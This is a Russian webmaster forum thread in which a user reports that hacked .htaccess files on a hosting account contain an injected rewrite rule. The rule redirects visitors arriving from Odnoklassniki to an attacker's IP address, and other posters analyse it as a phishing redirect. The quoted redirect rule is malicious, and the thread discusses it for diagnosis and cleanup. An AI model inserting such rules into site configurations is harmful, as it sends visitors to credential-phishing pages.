- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Вчера на одном очень "хорошем" хостинге опять обнаружил взлом, почти на всех сайтах в .htaccess к уже имеющемуся добавили код
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(odnoklassniki)\.(.*)
RewriteRule ^(.*)$ http://88.198.192.229/r.php?ref=%{HTTP_REFERER}&query=%{QUERY_STRING} [R=301,L]
</IfModule>
Судя по коду(поправьте, если не так) переправляется трафик на 88.198.192.229, если реферер содержит "odnoklassniki", но зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?
Скорее всего добавляли во все сайты на автомате, и ваш заодно зацепили.
Узнайте что за хостер на этом IP и жестоко накажите хацкеров!
По коду не подскажу, только начал изучать ModRewrite.
Могу ошибиться, что-то типа если на ваш сайт зашли по запросу "однокласники", то переправить на указанный IP с тем же запросом
http://urlquery.net/report.php?id=107532
вот данные на этот айпи: https://apps.db.ripe.net/search/query.html?searchtext=88.198.192.229#resultsAnchor
А сымсл и вправду не очень понятен ... если к вам пришли в результате поиска с одноклассников (там есть поиск???), то перегнать серфера с этим же поисковым запросом на свой фид?
Монетизируют пользователей одноклассников что ли?
скорее всего это не хостер "хороший", а вебмастер "пряморукий" :D
перекидывает на topprizy.ru
зареган в reg.ru - можно абузить
http://www.whois.com/whois/topprizy.ru
скорее всего это не хостер "хороший", а вебмастер "пряморукий"
у вебмастера аналогичные сайты и на других хостингах, но там все нормально, причем, что характерно, раньше на измененных файлах при взломе стоял пользователь рут, а теперь меняют так, что и юзер тот же и даже дата изменения файла не меняется...
---------- Добавлено 20.09.2012 в 19:50 ----------
перекидывает на topprizy.ru
зареган в reg.ru - можно абузить
а как доказать, что это они сделали, а не кто-то другой?:)
у вебмастера аналогичные сайты и на других хостингах, но там все нормально, причем, что характерно, раньше на измененных файлах при взломе стоял пользователь рут, а теперь меняют так, что и юзер тот же и даже дата изменения файла не меняется
имхо, если стоит владелец файла рут, а вы не рут как я понял, то исходный файл был удален и вместо него создан новый и именно рутом
а если пользователь не поменялся то это может быть и хостера ломанули (с правами рута отредактировали файл но влыделец то не поменялся) а может и вас взломали и с вашими правами изменили файл
и то что на других хостингах проблем нет тоже не может означать что зараза не у вас, может пароль вытянули из фтп клиента в котором был пароль только от последнего посещенного аккаунта
Burner-M, может конечно и хостер у вас такой, но айболитом вы все свои сайты на этом акке всё же проверьте. Не удивлюсь, если найдёте что-нибудь интересное, вроде шелла.
А если не найдёте - выход один - бежать :)
зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?
Да ладно, ну что Вы уж ))
Пациент с одноклассников переходит по внешней ссылке, редиректится на сайт злоумышленника, который так же выглядит как одноклассники. Там ему говорят "ссылка содержит вирус, переход заблокирован. Одноклассники заботятся о Вашей безопасности!" и предлагают или "Срок действия Вашего пароля истек. Создайте новый пароль, а для подтверждения введите старый" или "введите номер телефона для бла бла бла".
Мир полон мошенников, а мы так наивны.. Как жить дальше )))))
но зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?
Может форму авторизации покажут?